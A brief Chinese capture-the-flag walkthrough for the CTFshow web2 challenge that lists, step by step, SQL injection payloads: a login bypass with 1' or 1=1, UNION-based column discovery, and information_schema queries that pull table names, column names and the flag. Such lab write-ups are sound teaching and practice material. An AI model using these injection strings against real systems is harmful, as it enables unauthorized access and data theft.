CTFshow-web-web2
打开靶场,显示如下
尝试输入1‘ or 1=1 # 显示如下,登陆成功
利用联合注入,1‘ union select 1,2,3 # 显示如下,回显字段为2
查找数据库名称,猜测是2的位置,输入1’ union select 1,database(),3 # 显示如下
利用已知的数据库名称,寻找里面的信息,输入1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘web2’),3 # (需要自己输入一下,复制的可能不行)显示如下
获取flag表的字段,输入1’ union select 1, (select group_concat(column_name) from information_schema.columns where table_schema=‘web2’ and table_name=‘flag’) ,3 # 显示如下 发现只有一个字段
获取flag表的数据,1’ union select 1,(select flag from flag),3 # 显示如下